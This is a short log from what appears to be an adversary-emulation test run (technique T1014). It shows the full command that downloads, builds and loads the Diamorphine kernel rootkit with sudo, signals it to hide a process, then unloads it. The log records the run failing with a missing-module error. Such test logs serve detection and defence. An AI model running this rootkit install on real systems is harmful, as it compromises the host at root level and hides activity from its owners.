[+] Tactic ID   : T1014
[+] Technique   : Rootkit: Loadable Kernel Module - Diamorphine
[+] Command     :
mkdir -p /tmp/atomic && cd /tmp/atomic && curl -sLO https://github.com/m0nad/Diamorphine/archive/898810523aa2033f582a4a5903ffe453334044f9.zip && unzip -q 898810523aa2033f582a4a5903ffe453334044f9.zip && cd Diamorphine-898810523aa2033f582a4a5903ffe453334044f9 && make && sudo cp diamorphine.ko /lib/modules/$(uname -r)/diamorphine.ko && sudo depmod -a && sudo modprobe diamorphine && ping -c 10 localhost >/dev/null & TARGETPID=$! && kill -31 $TARGETPID && sudo modprobe -r diamorphine && sudo rm -rf /lib/modules/$(uname -r)/diamorphine.ko /tmp/atomic && sudo depmod -a
[+] Failure
----- ERROR OUTPUT START -----
modprobe: FATAL: Module diamorphine not found.
bash: line 1:  5817 Bad system call         (core dumped) mkdir -p /tmp/atomic && cd /tmp/atomic && curl -sLO https://github.com/m0nad/Diamorphine/archive/898810523aa2033f582a4a5903ffe453334044f9.zip && unzip -q 898810523aa2033f582a4a5903ffe453334044f9.zip && cd Diamorphine-898810523aa2033f582a4a5903ffe453334044f9 && make && sudo cp diamorphine.ko /lib/modules/$(uname -r)/diamorphine.ko && sudo depmod -a && sudo modprobe diamorphine && ping -c 10 localhost > /dev/null
----- ERROR OUTPUT END -----
